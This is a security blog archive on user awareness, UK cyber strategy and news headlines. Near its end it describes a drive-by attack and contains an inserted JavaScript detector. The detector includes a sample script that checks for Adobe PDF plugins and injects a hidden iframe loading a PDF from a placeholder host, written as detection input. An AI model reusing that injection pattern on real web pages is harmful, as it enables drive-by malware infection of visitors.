Whenever there’s a security incident, two things happen:
- security vendors scream, ‘it happened because they weren’t using our product, so clearly you should or it will happen to you’
- governments scream, ‘we need to enact the Cybersecurity Act/CISPA/Communications Bill/delete-as-applicable/and substitute-at-will in order to protect you, you-know-it-makes-sense’
Both have an axe to grind, and grind it they will. The only group that doesn’t have an axe is the poor bloody CISO working away at the coalface; underfunded, overworked and making do – and it’s a welcome relief to hear what it’s actually doing.
Wisegate recently published a paper on CISO discussions between themselves. It followed an earlier analysis that showed a major, if not the major, threat that concerns them is their own staff awareness – or lack of awareness – about cyber security issues. This actually makes a lot of sense. Trend Micro’s study towards the end of 2012 showed that more than 90% of successful APT attacks start with spear-phishing. Spear-phishing is harmless until the target clicks on a link or opens an attachment – so if you can teach staff how to avoid being phished, then you immediately avoid possibly the most serious threat of today.
The only way you can do that is by increasing user awareness – and Wisegate’s paper, CISOs Share Innovative & Practical Ways to Improve Security Awareness, tells us how CISOs are actually tackling the problem. It’s worth reading, so I won’t give everything away here – except perhaps to point out that one of the biggest problems is silo security; the users’ view of an unapproachable arbiter of what the user can and cannot do… That needs to go. And the Wisegate report gives useful pointers on how to do it.
You can download the report from here.
My news stories on Infosecurity Magazine from Tuesday 10 April until Friday 13 April, and Monday 16 April until Wednesday 18 April
NHS needs a security czar to prevent continuous data walkabout
While the South London Healthcare NHS Trust signs a Data Protection Undertaking, the security industry wonders why we have learnt nothing in the last two years – and calls for a new NHS data protection czar.
18 April 2012
PwC 2012 Information Security Breaches Survey: Preliminary findings report continued mobile insecurity
New statistics show that while many companies appear to understand the business threat from BYOD, many others are taking no precautions whatsoever.
18 April 2012
(ISC)² launches its new EMEA advisory board
In a move designed to offer genuine hands-on security experience to EMEA’s different security initiatives, professional body (ISC)² has launched a new Advisory Board for Europe, the Middle East and Africa (EAB).
18 April 2012
Google co-founder worries about the future of the internet
In an interview with the Guardian, the co-founder of Google lists the threats facing the future vitality of the internet.
17 April 2012
Shadowserver uncovers campaign against Vietnam in Hardcore Charlie’s file dump
An analysis of the hacked files dumped by hacker Hardcore Charlie fails to prove Chinese culpability, but finds evidence of ‘yet another cyber espionage campaign against Vietnam.’
17 April 2012
Iranian software manager hacks and dumps card details of 3m Iranians
Khosrow Zarefarid found and reported a flaw in the Iranian POS system. He reported it, but was ignored – so he used it and hacked 3 million Iranian debit card details.
17 April 2012
Dutch Pirate Party forced to take its Pirate Bay proxy off-line
In a move that will be monitored by the UK’s music industry association (BPI), its Dutch equivalent BREIN (translates as ‘Brain’) has obtained a court injunction forcing the political party, the Pirate Party, to take down the proxy site that was allowing users to continue using the blocked Pirate Bay (TPB).
16 April 2012
Is ACTA dead in the water, or is it resurfacing via the G8?
David Martin, European Parliament’s rapporteur on the ACTA treaty, is expected to recommend that parliament should reject ACTA. Does this mean the end for the Anti-Counterfeiting Trade Agreement?
16 April 2012
Commotion Wireless: an open source censorship buster
The great contradiction in modern techno-politics is the need for democracies to promulgate free speech in other countries while controlling it in their own.
16 April 2012
Boston police release unredacted Facebook data of ‘Craigslist killer’
The complete Facebook account of Philip Markoff, in hard copy and including friend IDs, was given by the Boston Police to the Boston Phoenix newspaper.
13 April 2012
EC asks how we would want the internet of things to be controlled
The European Commission (EC) has issued an online ‘consultation’ document: How would you envisage ‘governance’ of the ‘Internet of Things’?
13 April 2012
City trader fined £450,000 by the FSA
“For the reasons given in this Notice…”, says an FSA Decision Notice, “…the FSA has decided to impose on Mr Ian Charles Hannam a financial penalty of £450,000.”
13 April 2012
MPAA’s attempted takedown of Hotfile gets more and more difficult
Don’t throw the baby out with the bathwater says Google; and there’s more baby than bathwater suggests Prof. James Boyle.
12 April 2012
UK private members bill designed to censor pornography on the internet
Baroness Howe of Ildicote has introduced the Online Safety Act 2012, designed to force ISPs to install and operate pornography filters.
12 April 2012
Financial services the target in massive DDoS increase
A new analysis from Prolexic shows a huge increase in DDoS attacks, largely sourced in Asia and primarily attacking financial institutions.
12 April 2012
Smartphones are still firmly ‘enterprise-unready’
Research from Altimeter Group, Bloor Research and Trend Micro shows that the ‘consumer marketing’ legacy of many smartphones makes them ill-equipped to meet enterprise security demands.
11 April 2012
EU trade committee’s draft opinion on ACTA: Don’t ratify
The European Parliament’s Industry, Research and Energy committee for the Committee on International Trade has published its draft opinion on ACTA. Don’t ratify, it tells parliament.
11 April 2012
DHS gets California company to hack game consoles
In a project that started from law enforcement agencies’ request to the US Department of Homeland Security (DHS), which was then farmed out to the US Navy, Obscure Technologies of California has been awarded a contract to find ways of hacking game consoles.
11 April 2012
Real-time data mining comes to Twitter
Twitter is usually described as a micro-blogging social network. To many who monitor its ‘trending topics’ it is also an early warning news service, frequently pointing users to breaking news before the traditional news media reports it.
10 April 2012
Iran bids farewell to the internet; welcomes its own halal intranet
Iran’s answer to ‘criminality’ on the internet is not to fight criminality, but to block the internet. In the future, Iranians will have access to only the official national intranet and a whitelist of acceptable foreign sites.
10 April 2012
What an Englishman does in bed
Companies that monitor the end point behavior of their remote workers will have to start monitoring their (internet) behavior in bed. That at least is the inference to be drawn from a new street survey conducted by Infosecurity Europe.
10 April 2012
“The UK will become the best country in the world for e-commerce, the prime minister has promised.” His promise includes “a raft of measures to boost internet use in the UK, including a £1bn drive to get all government services online [within three years] and £15m to help businesses make the most of the web.”
This is not from the new UK cyber security strategy published by the Cabinet Office last week. It came from Tony Blair in 2002. And it didn’t happen.
Last week, the Cabinet Office explained that “Our vision is for the UK in 2015 to derive huge economic and social value from a vibrant, resilient and secure cyberspace, where our actions, guided by our core values of liberty, fairness, transparency and the rule of law, enhance prosperity, national security and a strong society.”
Cameron is perhaps less ambitious than Blair, allows more time (four rather than three years) and is focused on security. But is the end any more achievable?
I doubt it – and offer a few observations. Firstly, by far the majority of security companies and their experts have openly welcomed and praised this report. They have no option. The power of government purchasing makes it difficult for any business to openly criticise government. Indeed, the report acknowledges this lever:
To ensure smaller companies can play their part as drivers of new ideas and innovation we will bring forward proposals as part of the Growth Review to help small and medium sized enterprises fully access the value of public procurement.
However, regardless of what they say in public, many of these security experts have serious doubts. One, whose company statement had him praising the initiative, privately mailed me worrying about how many different government departments, quangos, committees, off-shoots and different law enforcement and intelligence agencies are involved in this strategy. It is always the joints that provide weaknesses, and this strategy has many joints.
The second observation, which to his credit, has also been highlighted by Amichai Shulman, CTO and co-founder of Imperva, is that there is no emphasis on protecting the individual.
The strategy has given only a few insights on how government is going to help businesses and individuals protect themselves. In fact, it has taken the traditional approach of non-intrusive, general advisor for tasks left to the individuals to do, e.g., keep safe and stay current with the latest threats. As we know, most consumers and enterprises don’t do that which explains why we’re in the cyber crime mess we live in today.
Amichai Shulman, Imperva
It would appear from the report that the government expects its GetSafeOnline website to be sufficient to protect the public. (You can see my attitude to GetSafeOnline here: UK Internet Security: State of the Nation – The Get Safe Online Report, November 2011.) I have serious doubts about its effectiveness. But I am more concerned there is no mention anywhere in the new cyber security strategy report of an existing CPNI-inaugurated initiative that has the potential to help the individual: the Warning Advice and Reporting Point, or WARP.
The WARP project is stagnating if not contracting. But the concept is still good. Given the right input and impetus WARPs could develop into a form of security-based social networking system, where individuals would share threat experiences between themselves, learn about new threats, and automatically report them back up the line eventually to CPNI. By sharing their information, by warning others, by offering help and advice to colleagues within any particular WARP, the individual security stance becomes much stronger.
This approach could help protect home computers from being recruited into botnets; and fewer active botnets means a more secure national infrastructure. I am worried that if the new strategy isn’t aimed at protecting the NI by protecting the individuals, how else is it to do it? Possibly by ramping up co-operation with and control over the ISPs. We will, says the report
Seek agreement with Internet Service Providers (ISPs) on the support they might offer to internet users to help them identify, address, and protect themselves from malicious activity on their systems.
It is too easy to move from this position to one of getting the ISPs to cut off infected users until they can prove their system is clean.
But it’s not all depressing; I have always known that there are comedians in government. Always leave them laughing when you say goodbye. And this report does just that:
- the Ministry of Justice will develop ‘cyber-tags’ as a form of online ASBO
- police forces are to recruit ‘cyber-specials’ (the internet traffic warden?)
- ‘kitemarks’ to help consumers distinguish between genuinely helpful products and advice and the purveyors of ‘scareware’.
- “…partnerships between the public and private sectors to share information on threats, manage cyber incidents, develop trend analysis and build cyber security capability and capacity.”
CESG share intelligence with the private sector? Now that one really made me laugh.
Mark this day and keep it clear: Tuesday 27 September. That’s this coming Tuesday. It’s the day of Infosecurity’s Autumn Virtual Conference. And it’s packed full of goodies: secure software development, responsible breach disclosure, tablets in the enterprise, governance and compliance, e-crime, a career in security and, of course, APTs.
And the speakers! Marc van Zadelhoff, Director of Strategy at IBM Security Solutions; Professor John Walker; Microsoft’s Jeremy Dallman; Raj Samani, Strategy Advisor for the Cloud Security Alliance and CTO EMEA at McAfee; Chenxi Wang from Forrester; Paul Simmonds, co-founder of the Jericho Forum; and many more.
Oh yes. And me. E-crime. 11:00am. 27 September. Be there.
I was talking to Amit Klein, the CTO of Trusteer, because I wanted a better understanding of how Rapport works. Rapport is Trusteer’s anti-banking trojan product. It’s free if your bank is a participating bank. The product prevents online bank transaction fraud; so it saves the banks money. If it saves the banks money, it is only fair that they pay for it. You get it free.
It works by protecting your browser. It recognises worrying behaviour and stops it. So, if I’m infected with Zeus (or some other bank trojan) and start an online bank transaction, Rapport sees Zeus trying to interfere and steps in to protect me.
Ah, I said. OK, you can protect my browser/bank interaction; but what if I’ve got a completely separate root-kit infection that doesn’t try to interfere with the transaction, just tries to steal my credentials?
Amit was very polite. He said, “We will protect your credentials when you’re online to your bank. But if you leave them lying around in some file on your computer…”
What he was saying was that security software can do what it is designed to do: but no software can protect against user stupidity. And that’s something we sometimes forget. We can install all the security we want: it won’t work if we forget to teach our users about security awareness.
PricewaterhouseCoopers LLP (PwC) has published a new report: Security awareness: Turning your people into your first line of defence. Our current strategy, says PwC,
has been very strongly biased to improving protection, reducing risks and mitigating issues by further investment in technology; solving what is perceived to be a technical issue with a technical solution.
But it clearly isn’t working since
financial losses due to cyber-crime continue to grow and despite major steps forward in technical defences such as anti-malware and authentication systems, credit card fraud and online fraud continue to increase and identity theft is an everyday occurrence.
So PwC starts to look elsewhere, and its eye falls on the user:
According to the Computer Security Institute’s Computer Crime and Security Survey as much as 25% of respondents said more than 60% of financial losses came from accidental breaches by insiders, not external hacks. The survey also identified that less than 1% of security budgets are allocated to awareness training.
This, then, is the solution:
What is required is a new approach in which an investment in understanding and influencing the behaviours of all those concerned is balanced against the continued investment in technology and processes…
…Your people are your first line of defence and with their full support, as part of a balanced programme of protective measures, you will be well placed to mitigate the information risks facing your organisation.
Well, you won’t get any argument here! See
This latter article adds an additional argument to PwC’s thesis:
It is not that security professionals cause break-ins, but there is little doubt in my mind that, by raising the bar, we are cultivating smarter, more sophisticated and more effective forms of attack. Much as the excessive and inappropriate use of antibiotics often results in more virulent drug-resistant microbes, so we are seeing the growth of highly-professional technically-brilliant attackers against systems that have been well protected against earlier malware.
C. Warren Axelrod
In other words, being reliant on technology for your security solutions is like chasing your own tail: you’ll just end up going faster and faster getting nowhere. Nevertheless, there is a hidden danger in PwC’s report. It is this: many security experts simply do not believe that it is possible to educate users sufficiently for them to behave securely. Consider this tweet from one of the world’s leading security researchers, Dancho Danchev:
The link, incidentally, is to an article in SC about the PwC report; which you don’t need to read because you’re already reading this :-)
But seriously. If you don’t believe that your users can regulate their own behaviour, what is left? You do it for them. You restrict them. You monitor them. You control them. You protect them from themselves.
You can justify this because they are your employees paid by you and working for your company. But just like the society that New Labour created all around us is a mirror of 1984, so this route will be 1984 writ small within your own organization. You may gain a little security but it will be at the cost of the staff sense of liberty and empowerment that leads to content, innovation, active involvement, happiness, and a low staff turnover. And it won’t really work; because you’ll be reverting to that very technological solution that hasn’t worked yet.
So the message you must take from the PwC report is exactly the one they suggest: empower your staff to behave securely; but never shackle them into it.
If loaded, the JS redirects to a page on several different web servers, which in turn loads a hidden iframe before redirecting again to a Canadian pharmacy website. The iframe contains the malware:
This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.
The exploits install an executable named game.exe, which we have not yet analyzed and which is not detected by many anti-virus products.
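The behaviour described above (walk the browser’s plugin list looking for ‘Adobe Acrobat’ or ‘Adobe PDF’, then inject a hidden iframe pointing at a PDF) is a recognisable signature on the defender’s side. The following JavaScript is an added example, not code from the original post or from the researchers it quotes: a small static check that a proxy, page-capture pipeline or incident responder could run over the text of inline scripts to flag that combination. The indicator list, the verdict rule and the two sample scripts are constructed for this example; the URL in the sample is a placeholder.

```javascript
// Added example: static indicators for the "PDF-plugin check + hidden iframe"
// pattern. These are assumptions chosen for illustration, not a vendor ruleset.
const INDICATORS = [
  { id: 'plugin-enum',   re: /navigator\.plugins/ },                        // walks the plugin list
  { id: 'adobe-pdf',     re: /Adobe (Acrobat|PDF)/ },                       // looks for a PDF reader
  { id: 'iframe-create', re: /createElement\s*\(\s*['"]iframe['"]\s*\)|<iframe/i },
  { id: 'hidden-frame',  re: /visibility\s*[:=]\s*['"]?hidden|display\s*[:=]\s*['"]?none/i },
  { id: 'pdf-src',       re: /\.pdf\b/i },                                  // frame target is a PDF
];

// Returns which indicators fired and whether the combination matches the
// described pattern: plugin enumeration for a PDF reader plus iframe injection.
// A single indicator (e.g. a site that checks navigator.plugins to pick a
// viewer) is not enough on its own; the verdict needs all three core parts.
function scanScript(source) {
  const hits = INDICATORS.filter(i => i.re.test(source)).map(i => i.id);
  const suspicious =
    hits.includes('plugin-enum') &&
    hits.includes('adobe-pdf') &&
    hits.includes('iframe-create');
  return { hits, suspicious };
}

// Constructed sample: the shape of script the post describes. The PDF URL is a
// placeholder; this is detector input, not a working page.
const SAMPLE_FLAGGED = `
for (var i = 0; i < navigator.plugins.length; i++) {
  var n = navigator.plugins[i].name;
  if (n.indexOf('Adobe Acrobat') != -1 || n.indexOf('Adobe PDF') != -1) {
    var f = document.createElement('iframe');
    f.style.visibility = 'hidden';
    f.src = 'http://example.invalid/PLACEHOLDER.pdf';
    document.body.appendChild(f);
  }
}`;

// Constructed sample: a legitimate site that also touches navigator.plugins
// and PDFs, to show the rule does not fire on one indicator alone.
const SAMPLE_BENIGN = `
if (navigator.plugins.length === 0) { showHtmlViewer(); }
document.getElementById('doc').src = 'brochure.pdf';`;

console.log('flagged sample:', JSON.stringify(scanScript(SAMPLE_FLAGGED)));
console.log('benign sample: ', JSON.stringify(scanScript(SAMPLE_BENIGN)));
```

The check is deliberately conservative: all three core indicators must fire, so a site that merely inspects plugins to choose a viewer is not flagged. The obvious limitation is that it matches plain text, so a packed or string-split loader (the kind that builds `'Adobe' + ' Acrobat'` at runtime) will slip past it; in practice this belongs alongside deobfuscation or behavioural sandboxing rather than replacing them.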
Once again we see the importance of user awareness: your anti-malware security software might not protect you; but it won’t need to if you simply don’t click on unexpected attachments.